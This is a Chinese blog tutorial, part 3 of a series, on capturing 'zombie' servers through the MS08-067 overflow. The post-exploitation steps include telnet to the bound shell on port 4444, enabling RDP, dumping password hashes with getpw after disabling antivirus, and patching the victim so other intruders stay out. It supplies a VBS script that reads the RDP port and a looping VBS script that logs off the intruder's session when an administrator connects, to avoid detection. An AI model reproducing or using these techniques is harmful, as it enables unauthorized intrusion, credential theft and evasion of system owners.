抓linux肉鸡漏洞,利用MS08067远程溢出漏洞抓肉鸡(3)

最新推荐文章于 2024-01-09 16:00:46 发布
最新推荐文章于 2024-01-09 16:00:46 发布
阅读量614 收藏 2
点赞数
文章标签: 抓linux肉鸡漏洞

8.获取系统详细信息以及执行各种命令

使用MS08067溢出工具成功溢出服务器后,还可以使用“telnet IP地址 4444”连接被溢出服务器,如图8所示,偶使用telnet进行了尝试,获取系统信息并开放了3389端口。

f940ae48db2101677ba59c2a65eb194b.png

图8 使用telnet连接被溢出计算机

说明:

(1)使用telnet连接被溢出计算机不如反弹shell好用,在telnet中有可能看不到输入,或者输入后反应较为迟钝。

(2)开放3389的方式有很多,网上有很多资料,这里使用别人给的一个工具,直接执行即可。

(3)可以使用以下脚本来查看对方服务器3389端口:

Echo Dim ReadComputerName >>port.vbs

Echo Set ReadComputerName=WScript.CreateObject("WScript.Shell") >>port.vbs

Echo Dim TSName,TSRegPath >>port.vbs

Echo TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal

Server\WinStations\RDP-Tcp\PortNumber" >>port.vbs

Echo TSName=ReadComputerName.RegRead(TSRegPath) >>port.vbs

Echo WScript.Echo("TermService port is:"^&TSName) >>port.vbs

Cscript port.vbs

9.登录被溢出服务器

打开mstsc远程终端连接器,输入IP地址、刚才添加的用户名和密码,验证成功后,顺利进入服务器,如图9所示。

8d8e318e2c0c1ede2413a1480d372adb.png

图9 顺利进入被溢出服务器

10.加固服务器

打江山容易,守江山难,一旦成功攻克服务器后,先对计算机的安全状况和安全措施进行查看和了解。根据个人经验先进行简单加固,如图10所示,就地取材,看看系统有什么杀毒软件,有无360卫士等,对系统的补丁进行修复,删除其它木马程序等。在本案例中,利用瑞星的漏洞扫描程序对系统的漏洞进行扫描,然后进行修复。

ca5a0f9e5a04c23ddaeb96b8ad2806d7.png

图10 扫描系统漏洞并修复

注意:

(1)如果系统安装有瑞星等杀毒软件,使用getpw获取系统帐号会失败的,这个时候就想办法开放服务器的远程终端,登录系统后,禁用杀毒软件,然后使用getpw获取系统的Hash密码。Getpw获取密码的格式为“getpw $local”,获取Hash密码一定要在shell中,否则获取的Hash密码为空,将获取的值复制到Txt文件中,并去除内容中的空格,正确的格式如图11所示。

6615f0ab066d8b79248d11a911467439.png

图11 获取的密码Hash值

(2)如果被溢出服务器已经开放3389,则登录后要注意管理员是否在线,以前网上有过批处理脚本,当管理员登录后,脚本会自动注销当前登录用户,感谢俺的好友“孤水绕城”提高了这样一个脚本,即:

on error resume next

set arg=wscript.arguments

If arg.count=0 then

wscript.echo "use:// cscript.exe FS.vbs port"

sleep 1000

wscript.quit

End If

Tport=arg(0)

Runs=false

While runs=false

Dim oShell,oExec,strOut,oRegExp,Matches,Match,Num,Tport

Set oShell = WScript.CreateObject("WScript.Shell")

Set oExec = oShell.Exec("netstat -an")

Set oRegExp = new RegExp

oRegExp.Pattern = "TCP[\s]+[\d\.]+:"&Tport&"[\s]+[\d\.]+:[\d]+[\s]+ESTABLISHED"

oRegExp.IgnoreCase = True

oRegExp.Global = True

Do While Not oExec.StdOut.AtEndOfStream

strOut = strOut & oExec.StdOut.ReadLine() & Chr(13) & Chr(10)

Loop

Set Matches = oRegExp.Execute(strOut)

Num = 0

For Each Match In Matches

Num = Num + 1

Next

if num > 1 then

Runs=true

oShell.run "logoff"

end if

Set Matches = Nothing

Set oRegExp = Nothing

Set oExec = Nothing

Set oShell = Nothing

Wend

Siului
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
论文研究 - DL和L-蛋氨酸在肉鸡中的相对生物利用
05-29
关于DL-蛋氨酸(DL-Met)与L-蛋氨酸(L-Met)的相对生物利用度(RBV)的研究产生了可变的结果。 进行了实验以确定DL到L-Met的RBV。 总共2268只1天大的雄性鸡被圈养在54只楼围栏(42只/笔)中。 有9种治疗方法(重复6...
linux肉鸡教程视频,超简单的菜鸟网吧肉鸡教程
weixin_39731916的博客
05-03 2405
大家好!我是rockwolf,我这次给大家做的教程是超简单的菜鸟网吧肉鸡教程.首先,需要的工具:1.灰鸽子一个:版本任意2.WebMan:开启HTTP服务的小工具3.啊D网络工具包:这个大家应该很常用的了````不用介绍的了吧`````我的鸽子上线是在本机建立FTP服务器的,大家看我操作.首先,在本机任意目录建立一个做为FTP服务器的文件夹,我为了方便,就在F盘的根目录下建立了.打开灰鸽子,工具...
肉鸡的几种方法
最新发布
m0_62207482的博客
01-09 656
尤其是下 XXX 片 的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是 所有文件都可以这样的,我只知道 RM 和 EXE 文件可以插入),别人下载打开后同时也会带 开你的网页木马,如果他的系统没有补供你网页木马所利用漏洞的话,那他就会中你的马 了。(详细动画可以去黑客网站搜索 445)缺点也很明显,如果别人不是用 new 账号登入 XP 的,你再登入上去就会把他挤出 去(XP 只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开 IE 下载木马了。
利用JBOSS漏洞肉鸡
404
01-23 7016
JBOSS是中间件,解析JSP的文件,由于中间件爆发漏洞一般很少人打补丁,这次我们利用jboss漏洞肉鸡利用工具:jexboss-master 这个工具是Python写的在我的资源里面已经分享可以下载,也可以自己在github上面寻找 网络搜索引擎:zoomeye(钟馗之眼) 在肉鸡之前我们要明白目标,那就是使用jboss中间件的服务器 进入zoomeye搜索关键词jboss(这
如何肉鸡
weixin_34358365的博客
02-13 2453
第一步:用scanipc扫描弱口令 不一会就会扫到很多有弱口令的主机(就我的经验在教育网上这样的主机比较多) 第二步:连接刚扫的肉鸡 这里我用opentelnet给扫描到开了空口令的主机开个端口让我们telnet连接上去 ,开了23端口,并可以连接上的主机就不用进行次步 第一步:用scanipc扫描弱口令 不一会就会扫到很多有弱口令的主机(就我的经验在教育网上这...
kali linux肉鸡教程,简单扫4899端口捉肉鸡菜鸟教程详细版
weixin_29513805的博客
05-02 3057
简单扫4899端口捉肉鸡 (菜鸟教程详细版)大家好。我是☆黑色毛衣☆。今天做的是简单扫4899端口捉肉鸡,只要把工具用好。找端口肉鸡不难可能有些扫135端口的扫描不了。这样就试试4899吧。因为扫135端口有些地方限制了。所以扫描不了。好了,话不多打。我们今次用到的工具有:1.S扫描器 (端口扫描器)2.4899过滤器 (过滤4899端口空密码主机专用)3.radmin (一个远程控制软件)4.免...
Linux下查找漏洞的N种兵器
07-01
Linux操作系统是一个开放源代码的免费操作系统,它不仅安全、稳定、成本低,而且很少发现有病毒传播,因此,Linux操作系统一直被认为是微软Windows系统的劲敌。近年来,随着Linux操作系统在我国的不断普及,随着...
YOLO养殖场肉鸡目标检测检测数据集
11-12
几千张YOLO养殖场肉鸡目标检测检测数据集,检测鸡的位置,yolov5、yolov7、yolov8等算法可以直接进行训练模型, 数据集和检测结果参考:https://blog.csdn.net/zhiqingAI/article/details/124230743
肉鸡屠宰、包装、存储发货作业指导书.doc
01-12
肉鸡屠宰、包装、存储发货作业指导书
2021年肉鸡行业研究报告
05-22
2021年肉鸡行业研究报告
详细解说“黑客”们热衷的热门抓鸡技术
Y525698136的博客
06-06 722
日前我看到很多人,自诩“黑客”到处抓鸡,每当我抓鸡这个词汇在我耳边出现的时候我总是不厌其烦!!!
如何防御DDoS攻击器肉鸡呢?只需要注意这几点即可!
qq_780662763的博客
06-17 1753
对计算有一些了解的朋友可能都会知道DDoS是一种互联网最普及的攻击方式,也是一些黑客的初级入门的技巧,每一次进行大规模的DDoS的攻击,那打出来的流量都让人咂舌。动静大而且波及极为广阔,DDoS要的就是流量,大多数黑客基本上为获取流量而不择手段,取“肉鸡”不过是其中一种。下面让我们看看都有哪些获取流量的方式呢? 之所以DDoS能造成影响巨大,原因在于其简单直接的攻击方式。以往,一个黑客入侵一个网站,需要经过技术分析、查找漏洞以及实施入侵等一系列的工作,有些时候还未必奏效。DDoS攻击之所以能造成这么大的伤
002-windowa基础(DOS命令:net user 用户 密码 /add)
fiveseven的博客
08-21 3832
002-windowa基础(DOS命令:net user 用户 密码 /add)
telnet localhost 44444 telnet: connect to address ::1: Connection refused
weixin_44519124的博客
12-05 5346
1.检查memcached是否安装,且已开启memcached服务 rpm -qa memcached 有输出说明已安装 如果没有输出则没有安装 yum install memcached 2.检查telnet 是否安装,且已开启telnet服务 rpm -qatelnet 有输出说明已安装 如果没有输出则没有安装 yum install telnet 3.检查telnet-se...
445端口MS08-067溢出拿cmdshell
Ganwcheng的博客
03-28 3311
(仅用来测试,现在也无法使用转载出自:http://www.cnhonkerarmy.com/thread-167512-1-1.html)漏洞详解:             445端口通常在溢出称呼目标主机的监听端口为4444,其对应的PID为2030(随机值)。毫无疑问她应该和某个系统服务相对应,输入tasklist /svc 后发现其对于的进程是svchost.exe。该进程在系统中有多个服...
Linux公网渗透抓鸡实验
weixin_44162346的博客
08-31 3086
收集测试网络环境 当我们拿到一台目标内网服务器,或者说肉鸡服务器,首先要做的就是收集信息。而在我看来需要收集的信息中,最重要的之一便是肉鸡的网络环境。 实验环境 首先介绍下本次测试的服务器环境: 攻击机Mac:110.xx.xx.xx 外网 肉鸡centos:192.168.16.x 目标内网16网段系统 内网渗透范围:192.168.17.0/24 目标内网17网段系统 本次测试模拟假设:由...
linux肉鸡入侵详细教程,Linux XOR.DDoS入侵排查步骤 | 聂扬帆博客
weixin_39553653的博客
05-02 989
0x00 病毒详情XOR.DDoS类型病毒主要特点,用暴力猜解目标机器ssh弱密码的方式,入侵目标机器,然后执行相应的shell脚本,安装病毒到目标机器,将目标机器变为DDoS肉鸡,然后病毒利用多线程发起DDoS攻击。0x01 排查步骤1、登录机器安装clamav进行病毒扫描#安装$yum install -y epel-release$ yum install -y clamav#更新病毒库$...
Linux服务器沦陷为肉鸡的全过程实录
热门推荐
smstong的成长轨迹
03-18 2万+
Linux服务器沦陷为肉鸡的全过程实录Linux服务器沦陷为肉鸡的全过程实录 从防火墙瘫痪说起 查找黑客行踪的方法 沦陷过程分析 1 oracle用户密码被破解 2 黑客动作推演 3 攻击工具一览 深刻教训1 从防火墙瘫痪说起2015年3月10日,还没到公司就被电话告知办公室无法正常连接互联网了,网速非常慢,无法正常浏览网页。急急忙忙感到公司,开始查找问题。首先排除了交换机故障,因为内部局域网正常。
kali linux肉鸡教程
10-27
Kali Linux肉鸡教程是一种网络安全攻击技术,旨在通过社会工程学攻击和漏洞利用技术获取远程计算机的控制权。以下是一些步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用漏洞或社会工程学攻击技术,将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值